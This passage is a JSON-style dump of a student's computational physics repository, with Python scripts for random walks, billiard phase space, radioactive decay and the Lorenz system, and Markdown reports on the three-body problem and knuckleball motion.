"e4bebe5f25583e51534e1afb9c26a40de77dc7fb", "content_id": "b4faa873598649e2f845955c23342ce48a1a94ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 115, "license_type": "no_license", "max_line_length": 115, "num_lines": 1, "path": "/Untitled.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "![7b87cc188618367a5954ce8b26738bd4b11ce5db](/Users/apple/Desktop/7b87cc188618367a5954ce8b26738bd4b11ce5db.jpg)![]()" }, { "alpha_fraction": 0.44592517614364624, "alphanum_fraction": 0.5146079063415527, "avg_line_length": 23.94871711730957, "blob_id": "b0bf9b068821c67032d371a708ebff855742a64c", "content_id": "f66890979535623f9092aaadddab6d6ee31053ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1961, "license_type": "no_license", "max_line_length": 57, "num_lines": 78, "path": "/final/3-randomwalk.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.integrate import odeint\nfrom mpl_toolkits.mplot3d import Axes3D\ndef randpath(T):\n x=[0]\n y=[0]\n z=[0]\n t=[0]\n r2ave=[0]*T\n for i in range(T):\n ruler=random.randint(1,3)\n if 
ruler==1:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1) \n else:\n x.append(x[-1]-1)\n y.append(y[-1])\n z.append(z[-1])\n if ruler==2:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n y.append(y[-1]+1)\n else:\n y.append(y[-1]-1)\n x.append(x[-1])\n z.append(z[-1])\n if ruler==3:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n z.append(y[-1]+1)\n else:\n z.append(y[-1]-1)\n x.append(x[-1])\n y.append(z[-1]) \n r2ave[i]=r2ave[i]+(x[-1]**2+y[-1]**2+z[-1]**2) \n return x,y,z,t,r2ave\nx,y,z,t,r2ave=randpath(500)\nx1,y1,z1,t1,r2ave1=randpath(500)\nfig = plt.figure(figsize=(9,7))\nax1=fig.gca(projection='3d')\nax1.plot(x1,y1,z1,color='black')\nax1.plot(x,y,z,color='blue')\nax1.set_title('random walk in 3 dimension')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_zlabel('z')\n#ax1.view_init(30,0)\n\n\n#-----------\nr2ave=[0]*100\nfor i in range(5000):\n x1,y1,z1,t1,r2ave1=randpath(100)\n for j in range(len(x1)-1):\n r2ave[j]=r2ave[j]+r2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,r2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<r2>')\nplt.title('random walk in one dimension')\n#plt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,r2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n\n " }, { "alpha_fraction": 0.32249894738197327, "alphanum_fraction": 0.37990713119506836, "avg_line_length": 25.65517234802246, "blob_id": "394b5f8dd4803d51cd8d8933a91f1429c0c74d64", "content_id": "f53ed76437a6f2eb92f95b1cf0fc7329b4351857", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2369, "license_type": "no_license", "max_line_length": 91, "num_lines": 87, "path": "/homework8/code/phasespace2.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a, RR,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n VX=[vx]\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n VX.append(vx)\n t.append(t[-1]+dt)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2 and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2 and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n x[-1]=2*r-x[-1]\n vx=-vx\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n x[-1]=-2*r-x[-1]\n vx=-vx \n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif (x[-1]**2+(y[-1]-a)**2)<=RR**2:\n d=math.sqrt(x[-1]**2+y[-1]**2)\n d1=2*RR-d\n x.append(x[-1]*d1/d)\n y.append(y[-1]*d1/d)\n t.append(t[-1]+dt)\n cs=x[-1]/d\n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n T=t[-1]\n return x,y,VX\n\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.2,800)\naa=B[0]\nbb=B[1]\ncc=B[2]\n\nV=[]\nxx=[]\nfor i in range(len(B[1])-1):\n if 
abs(bb[i])<0.001:\n V.append(cc[i])\n xx.append(aa[i])\n \n \nplt.plot(xx,V,'o', ms=2,color='black')\n\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('r=0.2 in center,phase-space')\n\n \n \n \n \n \n" }, { "alpha_fraction": 0.7149075269699097, "alphanum_fraction": 0.7573449611663818, "avg_line_length": 49.88888931274414, "blob_id": "e33d38c31bc5f32d701354791db94d6b07a3e973", "content_id": "b207b8d4e8d4c1ac7713c111709c74c6f8ed590a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 461, "num_lines": 18, "path": "/homework_03.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "----------\n\n> Written with [StackEdit](https://stackedit.io/).\n# Homework_03\n[file_01](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/temp2.py )\n> 自己写的,但很简单只能前后两次移动-_-#\n> 利用while loop,\n> 清屏语句 import os\n> s=os.system(\"clear\")(for Mac)\n> \n\n[file_02]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/name.py)\n> 借鉴了[qqyyff](https://github.com/qqyyff)的作业,表示感谢 :-)\n> 使用time module\n\n> **time.sleep(secs)**\n\n> Suspend execution of the calling thread for the given number of seconds. The argument may be a floating point number to indicate a more precise sleep time. The actual suspension time may be less than that requested because any caught signal will terminate the sleep() following execution of that signal’s catching routine. Also, the suspension time may be longer than requested by an arbitrary amount because of the scheduling of other activity in the system.\n\n\n\n" }, { "alpha_fraction": 0.4582456052303314, "alphanum_fraction": 0.5284210443496704, "avg_line_length": 23.465517044067383, "blob_id": "f8875a08241b72250ea01f3e5f90a8c1f69bf930", "content_id": "439c6b1a48f1ab1c22e49b4f8c9e68437f053bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1435, "license_type": "no_license", "max_line_length": 48, "num_lines": 58, "path": "/final/2-d randomwalk.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\ndef randpath(T):\n x=[0]\n y=[0]\n t=[0]\n r2ave=[0]*T\n for i in range(T):\n ruler=random.randint(1,2)\n if ruler==1:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1) \n else:\n x.append(x[-1]-1)\n y.append(y[-1])\n if ruler==2:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n y.append(y[-1]+1)\n else:\n y.append(y[-1]-1)\n x.append(x[-1])\n r2ave[i]=r2ave[i]+(x[-1]**2+y[-1]**2) \n return x,y,t,r2ave\nx,y,t,r2ave=randpath(100)\nx1,y1,t1,r2ave1=randpath(100)\nplt.plot(x,y,color='black')\nplt.plot(x1,y1,color='blue')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('random walk in 2 dimension')\n#-----------\nr2ave=[0]*100\nfor i in range(5000):\n x1,y1,t1,r2ave1=randpath(100)\n for j in range(len(x1)-1):\n r2ave[j]=r2ave[j]+r2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,r2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<r2>')\nplt.title('random walk in one dimension')\n#plt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,r2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n\n \n" }, { "alpha_fraction": 0.5827686190605164, "alphanum_fraction": 0.6563407778739929, 
"avg_line_length": 30.303030014038086, "blob_id": "eb1e1da5e9b4c07ba8e7e5e327e805af50c569ad", "content_id": "3220a478d344c7e193310b7dcd96993fd0200083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 92, "num_lines": 33, "path": "/Ch1_1.4.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\nimport matplotlib.pyplot as plt\ntime=[0]\nT=10000\na=10#初始A粒子数\nb=0#初始B粒子数\nA=[a]#the number of nucleus A\nB=[b]#the number of nucleus B\nAnalytic_A=[a]\nAnalytic_B=[b]\ndt=0.1\ntA=1000#time constant for A\ntB=1#time constant for B\ne=2.718281828459\ni=0\nwhile i<=int(T/dt-1):\n#for i in range(int(T/dt)-1):\n num_of_a_at_dt=A[i]-dt*A[i]/tA\n A.append(num_of_a_at_dt)\n num_of_b_at_dt=B[i]+dt*(A[i]/tA-B[i]/tB)\n B.append(num_of_b_at_dt)\n time.append(dt*(i+1))\n Analytic_A.append(a*2.718281828459**(-dt*(i+1)/tA))\n Analytic_B.append(b+a*tB/(tA-tB)*(2.718281828459**(-dt*(i+1)/tA)-2.718**(-dt*(i+1)/tB)))\n i=i+1\nplt.xlabel('Time(s)')\nplt.ylabel('Number of particles')\nplt.title('Radioactive Decay of 2 nucleus')\nline1,= plt.plot(time,A,color='blue',linewidth='3.0',label='A')\nline2,= plt.plot(time,B,color='pink',linewidth='3.0',label='B')\nline3,= plt.plot(time,Analytic_A,color='yellow',linestyle='-.',label='analytic_A')\nline4,= plt.plot(time,Analytic_B,color='red',linestyle='-.',label='analytic_B')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.6990927457809448, "alphanum_fraction": 0.7837701439857483, "avg_line_length": 41.10638427734375, "blob_id": "886b10e4069fd5935d0e9617f357663a86dc9b35", "content_id": "be6d6ab4f9c69f650cd4055f12e9edfc449f16c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1984, "license_type": "no_license", "max_line_length": 300, "num_lines": 47, "path": "/ch4/The Three-Body Problem.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# The Three-Body Problem\n\n2015301020090\n\nProblem 4.16\n\n##Background\n\nIn this section we'll consider one of the simplest three-body problems,the Sun and two planets,Earth&Jupiter.The magnitude of the forces between the planets are given by inverse-square law.We assume that the orbits of the plants are coplanar.Again we use Euler-Cromer method to calculate the motion.\n\nProblem 4.16 require us to carry out a stimulation which consider Earth,Jupiter&the Sun.And take the center of mass as the origin.I don't know how to choose the initial positons of the planets so I just assume that they are all in x-axis and the initial speed directions are parallel to y-axis.\n\n## [Codes](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/ch4.py)\n\n## Results&Analysis\n\n1.When the mass of Jupiter is unchanged.\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/1.png)\n\nTwo planets circulate around the sun.The sun is also moving along y-axis.\n\n2.The mass of jupiter increased to 10 times of its true mass.\n\n ![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/2.png)\n\n3.The mass of jupiter increased to 100 times of its true mass.\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/3.png)\n\n4.The mass of jupiter increased to 300 times of its true mass.\n\n![6]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/6.png)\n\n\n\n5.The 
mass of jupiter increased to 1000 times of its true mass.\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/4.png)\n\nJupiter drifts apart but Earth still moves around the Sun\n\n## Defect\n\nThe text book suggests us to give the Sun an initial velocity to make the total momentum of the the system exactly zero so that the center of mass will remain fixed.However,here's the result I got.\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/5.png)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6550976037979126, "alphanum_fraction": 0.7156181931495667, "avg_line_length": 75.83333587646484, "blob_id": "6f907cb8c1eaee306a32362f59122f469f364db6", "content_id": "26d0c2b20691a432ccee29757dd84c2bcf65686e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4626, "license_type": "no_license", "max_line_length": 466, "num_lines": 60, "path": "/Baseball.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section2.3&4\n--------------------\n\n贾雪巍 2015301020090\nproblem2.17 Kunckleball\n\n--------------------------\n## Throwing a Baseball\n-----------------------------------\n\n## Background\nThe basic equations of motion of for a baseball are the same as those of the cannon shell,with a few deflections, and we will again use the Euler method in our stimulations.Here are the changes we made on the model.\n\n**1**.The force on a baseball due to air resistance is given by the same form as cannon shell's.But the drag coeffcient is a function of v,and is depent on the ball conditions.(P33.fig 2.6)At high speeds or when throwing a rough ball the flow become turbulent.We take \n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{B_2}{m}=0.0039&plus;\\frac{0.0058}{1&plus;exp[(v-v_d)/\\Delta]}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{B_2}{m}=0.0039&plus;\\frac{0.0058}{1&plus;exp[(v-v_d)/\\Delta]}\" title=\"\\frac{B_2}{m}=0.0039+\\frac{0.0058}{1+exp[(v-v_d)/\\Delta]}\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=v_d=35m/s,\\Delta=5m/s\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?v_d=35m/s,\\Delta=5m/s\" title=\"v_d=35m/s,\\Delta=5m/s\" /></a>\n\n**2**.The v in air resistance is the speed relative to the air. For a ball spinning about an axis perpendicular to the direction of travel,when add the drag force on different sides of the ball,there will be a net force perpendicular to the center of mass velocity called Magnus force.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=F_M=S_0wv_x\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?F_M=S_0wv_x\" title=\"F_M=S_0wv_x\" /></a>\nfor baseball<a href=\"http://www.codecogs.com/eqnedit.php?wlatex=S_0/m\\approx4.1\\times10^{-4}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?S_0/m\\approx4.1\\times10^{-4}\" title=\"S_0/m\\approx4.1\\times10^{-4}\" /></a>.w is the angle velocity we assume w is a constant.\n\n**3**. 
Knuckleball.Baseball is not a total smooth ball.Since the drag force is greater for a smooth ball than for a rough ball,there will be an imbalance on the two sides of the ball,giving a net force in the direction of the rough side.If the ball rotates **slowly** as it moves so that the exposed stitches moves, the force changes direction.For simplicity we will assume that the ball spins about a vertical axis .The force is given approximately by the function\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)&plus;0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)&plus;0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" title=\"$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)+0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" /></a>\n\n\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch3.py)\n--------------------\n\n## Result&Analysis\n---------------------\n1.different center of mass velocity\n(I choose this initial angular orientation and angular velocity because it looks ok,others go crazy......-_-#)\n![FIG1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball1.png)\n![fig2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball2.png)\n **When change center of mass velocity,the curve shape doesn't change.**\n **The largest velocity has the longest range.**\n\n---------------------------\n2.different w\n![fig3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball3.png)\n![fig4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball4.png)\n**pi/5 has the longest range.\nFrom the x-z figure,I can approximately see how a Knucleball moves.It's hard to say where it lands.**\n\n----------------\n3.different theta\nI abandon the curves with x<0\n![fig5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball5.png)\n![fig6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball6.png)\n**1.8pihas the longest range.Still can't tell how this works.It is not consistent with my experience -_-#**\n## Defect\nThe air resistance shouldn't have x<0(??),I think the forces in this model are wrong.\nThe actual the baseball motion may not have a horizontal velocity.Its spin may be more complicated.And the forces in this model are just approximations which can make our calculaton easier. 
\n## The way to catch a knuckleball is to wait until it stops rolling and pick it up.--Bob Uecker哈哈哈\n" }, { "alpha_fraction": 0.5225316286087036, "alphanum_fraction": 0.6096202731132507, "avg_line_length": 22.780487060546875, "blob_id": "e59a79f65322fa5400ca1f449e867cd2434aa93a", "content_id": "2a1e61f069931fd4a15b22f196a50594b53b4873", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1985, "license_type": "no_license", "max_line_length": 41, "num_lines": 82, "path": "/final/randpath副本.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(T):\n x=[0]\n t=[0]\n x2ave=[0]*T\n for i in range(T):\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1)\n else:\n x.append(x[-1]-1)\n x2ave[i]=x2ave[i]+x[-1]**2\n return x,t,x2ave\nx,t,x2ave=randpath(100)\nx1,t1,x2ave1=randpath(100)\nfig = plt.figure(figsize=(10, 5))\nplt.plot(t,x,'o',ms=4,color='red')\nplt.plot(t1,x1,'o',ms=4,color='blue')\nplt.xlabel('time(step number)')\nplt.ylabel('X')\nplt.title('random walk in one dimension')\n\n\n#----------\naverage=[0]*101\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)):\n average[j]=average[j]+x1[j]/5000\nplt.figure(figsize=(10,5))\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.plot(t1,average)\nplt.xlabel('time(step number)')\nplt.ylabel('<x>')\nplt.title('random walk in one dimension')\nplt.text(0,0.15,'<x> versus time')\n#-----------\\\nx2ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x2ave[j]=x2ave[j]+x2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,x2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<x2>')\nplt.title('random walk in one dimension')\nplt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,x2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n#------\nx4ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x4ave[j]=x4ave[j]+x1[j+1]**4/5000\n\nplt.figure(figsize=(10,5))\nplt.grid()\nplt.plot(t0,x4ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<x4>')\nplt.title('random walk in one dimension')\na,b,c=np.polyfit(t0,x4ave,2)\nideal4=[]\nfor i in range(100):\n ideal4.append(a*i**2+b*i+c)\nplt.plot(t0,ideal4,color='red')\nplt.text(20,20000,'<x4>versus time')\nprint(a,b,c)\n \n \n \n\n\n \n\n\n\n" }, { "alpha_fraction": 0.39566299319267273, "alphanum_fraction": 0.4653394818305969, "avg_line_length": 20.96875, "blob_id": "555b10b85d47c65c4d77e270344ffc3ca82b7868", "content_id": "1b0a5518734e5ed77fb57c775c3ef2297d15dd68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2813, "license_type": "no_license", "max_line_length": 56, "num_lines": 128, "path": "/homework8/code/phasespacebliiard.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\nimport numpy as np\ndef billiard(x0,y0,vx0,vy0,r,a,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n VX=[vx]\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n VX.append(vx)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d2=math.sqrt(vx**2+vy**2)\n d1=2*r-d\n \n 
x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]>r:\n x[-1]=2*r-x[-1]\n x.append(x[-1])\n y.append(y[-1])\n vx=-vx\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r:\n x[-1]=-2*r-x[-1]\n vx=-vx \n x.append(x[-1])\n y.append(y[-1])\n VX.append(vx)\n T=t[-1]\n return x,y,VX\n\nfig = plt.figure(figsize=(11, 11))\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,800)\na=B[0]\nb=B[1]\nc=B[2]\nV=[]\nxx=[]\nA=billiard(0.5,0.5,-0.4,-0.3,1,0.01,800)\naa=A[0]\nbb=A[1]\ncc=A[2]\nVV=[]\nxxx=[]\nC=billiard(0.5,0.5,-0.4,-0.3,1,0.1,800)\naaa=C[0]\nbbb=C[1]\nccc=C[2]\nVVV=[]\nxxxx=[]\nD=billiard(0.5,0.5,-0.4,-0.3,1,1,800)\naaaa=C[0]\nbbbb=C[1]\ncccc=C[2]\nVVVV=[]\nxxxxx=[]\nplt.subplot(2,2,1)\nplt.xlim(-1,1)\n\nfor i in range(len(B[1])-1):\n if abs(b[i])<0.001:\n V.append(c[i])\n xx.append(a[i])\nplt.plot(xx,V,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0')\nplt.subplot(2,2,2)\nplt.xlim(-1,1)\n\nfor i in range(len(A[1])-1):\n if abs(bb[i])<0.001:\n VV.append(cc[i])\n xxx.append(aa[i])\nplt.plot(xxx,VV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0.01')\nplt.subplot(2,2,3)\nplt.xlim(-1,1)\n\nfor i in range(len(C[1])-1):\n if abs(bbb[i])<0.001:\n VVV.append(ccc[i])\n xxxx.append(aaa[i])\nplt.plot(xxxx,VVV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0.1')\nplt.subplot(2,2,4)\nplt.xlim(-1,1)\n\nfor i in range(len(D[1])-1):\n if abs(bbbb[i])<0.001:\n VVVV.append(cccc[i])\n xxxxx.append(aaaa[i])\nplt.plot(xxxx,VVV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=1')\n\n" }, { "alpha_fraction": 0.46488550305366516, "alphanum_fraction": 0.5022900700569153, "avg_line_length": 16.399999618530273, "blob_id": "ee05983fd4a38a7618e8d00d36b1165ec6bb9305", "content_id": "2c3e320e31b2f1e32691949828c5c9b350e5e8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 47, "num_lines": 75, "path": "/Ch3/lorenz poin.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef lorenz(r,sigma,b):\n x=[0]\n y=[1]\n z=[1]\n t=[0]\n i=0\n t_i=0\n dt=0.01\n while t_i<=50:\n x_i=x[i]\n y_i=y[i]\n z_i=z[i]\n t_i=t[i]\n x_dt=x_i+sigma*(y_i-x_i)*dt\n y_dt=y_i-(x_i*z_i-r*x_i+y_i)*dt\n z_dt=z_i+(x_i*y_i-b*z_i)*dt\n T=t_i+dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n t.append(T)\n i=i+1\n return x,y,z,t\nL=lorenz(25,10,8/3)\n\n\n\n\n#fig=plt.figure()\n#ax = fig.gca(projection='3d')\nX=np.array(L[0])\nY=np.array(L[1])\nZ=np.array(L[2])\nT=np.array(L[3])\n\n\n \n#ax.plot(X,Y,Z,color='black')\nplt.subplot(121)\npoin_z=[]\npoin_x=[]\npoin_y=[]\nfor i in range(len(X)-1):\n if X[i]*X[i+1]<=0:\n poin_z.append(Z[i])\n poin_y.append(Y[i])\n \nplt.plot(np.array(poin_y),np.array(poin_z),'o')\nplt.xlabel('y')\nplt.ylabel('z')\nplt.title('z versus y when x=0') \n\nplt.subplot(122)\np_z=[]\np_x=[]\np_y=[]\nfor i in range(len(X)-1):\n if Y[i]*Y[i+1]<=0:\n p_z.append(Z[i])\n p_x.append(X[i]) 
\nplt.plot(np.array(p_x),np.array(p_z),'o')\nplt.xlabel('x')\nplt.ylabel('z')\nplt.title('x versus z when y=0') \n\n#for angle in range(0, 360):\n#ax.view_init(30, 0)\n#plt.draw()\n #plt.pause(.001)\n#plt.plot(L[0],L[2])\nplt.show()\n " }, { "alpha_fraction": 0.5068399310112, "alphanum_fraction": 0.5896033048629761, "avg_line_length": 20.441177368164062, "blob_id": "4bc5cc22e3c64f4bf466ab06d39e9aee29cd4633", "content_id": "93e8cd04a2ae7f041e15ae93e0c5e4f9263b97c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 43, "num_lines": 68, "path": "/Ch3/lorenz.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef lorenz(r,sigma,b,TIME):\n x=[1]\n y=[0]\n z=[0]\n t=[0]\n i=0\n t_i=0\n dt=0.01\n while t_i<=TIME:\n x_i=x[i]\n y_i=y[i]\n z_i=z[i]\n t_i=t[i]\n x_dt=x_i+sigma*(y_i-x_i)*dt\n y_dt=y_i-(x_i*z_i-r*x_i+y_i)*dt\n z_dt=z_i+(x_i*y_i-b*z_i)*dt\n T=t_i+dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n t.append(T)\n i=i+1\n return x,y,z,t\nL1=lorenz(100,10,8/3,50)\nL2=lorenz(100,10,8/3,50)\nfig = plt.figure(figsize=(15, 4))\n#ax = fig.gca(projection='3d')\nax1 = fig.add_subplot(131, projection='3d')\nax2 = fig.add_subplot(132, projection='3d')\n\nax3 = fig.add_subplot(133, projection='3d')\n#ax.view_init(90, 0)\n#ax.set_xlabel(\"X label\")\n#ax.set_ylabel(\"Y label\")\n#ax.set_zlabel(\"Z 